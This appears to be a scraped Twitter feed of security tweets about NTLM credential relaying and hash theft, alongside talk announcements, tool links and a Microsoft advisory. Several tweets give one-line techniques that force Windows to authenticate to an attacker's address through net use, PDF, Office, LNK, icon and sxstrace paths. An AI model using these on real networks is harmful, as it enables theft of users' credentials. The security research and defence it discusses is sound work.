-
Did know that u can steal
#NetNTLMv2 by changing#SMB port to bypass sec-things: net use \\1.2.3.4@80\t or pdf : /F (\\\\IP@80\\t) or dubdoc : ///IP@80/t or doc: Target="file://IP@80/t.dotx" or lnk: URL=file://IP@80/t.htm or: IconFile=\\IP@80\t.ico#RedTeam#NTLM cc@ddouhinePrikaži ovu nit -
#InfoSec What is your favorite internal Network penetration test? What are the tools associated? Starting with: responder + ntlmrelay. You?#cybersecurity#pentest#responder#ntlm#DC -
A new way to exfiltrate
#NTLM hash by forcing#SMB auth ? Check this#Microsoft#lolbin: sxstrace parse -logfile:\\192.168.XX.XX\lol.etl -outfile:a.txt || sxstrace trace -logfile:\\192.168.xx.xx\a cc@Oddvarmoe -
I'm happy to share that the talk I've submitted with
@simakov_marina "Advanced Credential Relaying Techniques and How to Thwart Them" got accepted to@WEareTROOPERS. You don't want to miss this talk if you're interested with what is the latest in#NTLM relay... -
NTLMRecon - A fast
#NTLM reconnaissance and information gathering tool without external dependencies https://github.com/sachinkamath/ntlmrecon … -
Rainbow Crackalack - Rainbow Table Generation And Lookup Tools http://j.mp/2Kx0fRf
#Cracking#Hashes#Linux#Lookup#NTLM#NTLMHashespic.twitter.com/bgeDPgvDZ2
-
The
@defcon talk I gave with@simakov_marina on#NTLM relay is now available online! https://youtu.be/vIISsfLh4iM If you haven't seen it live and you're interested in#ActiveDirectory security you should definitely check it out! -
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV190023 … great to see
#microsoft is taking action to reduce#NTLM attack surface by advising customers to enable LDAP relay mitigations. We talked about these issues at our@defcon and@BlackHatEvents talks.@simakov_marina -
Thanks to everyone who came to our
#DEFCON talk! Was great to be back. Now seriously... Stop using#NTLM
@YaronZipic.twitter.com/DwwfQzsQJf
-
It’s hump day, go out and get those hashes!
#NTLM#hashcat (


@OsandaMalith &@m3g9tr0n)https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ …Prikaži ovu nit -
PivotSuite - A Network Pivoting Toolkit http://j.mp/2XAU1Yt
#Firewall#NTLM#Pivoting#PivotSuite#PortForwarding#Python#Subnetpic.twitter.com/YTvlzytPdY
-
Critical Vulnerabilities in
#NTLM Allow Remote Code Execution and Cloud Resources Compromise https://blog.preempt.com/security-advisory-critical-vulnerabilities-in-ntlm … -
1/ TLDR:
#NTLM is a pig. Outdated protocol with inherent insolvable problems. Due to backward compatibility Microsoft wasn't able to get rid of it. So they had to put on lipstick, makeup and mascara. But it is still a pig. Details of the attacks below (&@BlackHatEvents I assume)https://twitter.com/simakov_marina/status/1138493972261801985 …Prikaži ovu nit -
Firework - Leveraging Microsoft Workspaces in a Penetration Test http://j.mp/2OmkAZi
#Credentials#Distributed#Firework#NTLM#Pythonpic.twitter.com/KrLsA1aH7N
-
#ExchangeRelayX - An#NTLM Relay Tool To The EWS Endpoint For On-Premise Exchange Servers (Provides An#OWA For Hackers) https://goo.gl/7tC7U5 pic.twitter.com/JZrtfxY7Tc
-
NtlmRelayToEWS -
#Ntlm Relay Attack To Exchange Web Services https://goo.gl/cKwvHX pic.twitter.com/J3Gk6vaSmf
-
Bad-PDF - Steal
#NTLM Hashes with Bad-PDF Author:@DeepZechttps://github.com/deepzec/Bad-Pdf -
Bad-Pdf - Steal NTLM Hashes With A PDF From Windows Machines http://bit.ly/2I7Zxd2
#infosec#hacking#hackers#pentesting#pentest#programming#coding#DataSecurity#cybersecurity#cyberattack#exploit#opensource#linux#github#PDF#NTLM pic.twitter.com/58pBAq9LLO
-
How to leak NTLM hash via HTML tags (for Internet Explorer and Edge): https://github.com/ShikariSenpai/Leak-NTLM-hash-via-HTML …
#NTLM#IE#Edgepic.twitter.com/4xmd4CnFoK
-
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.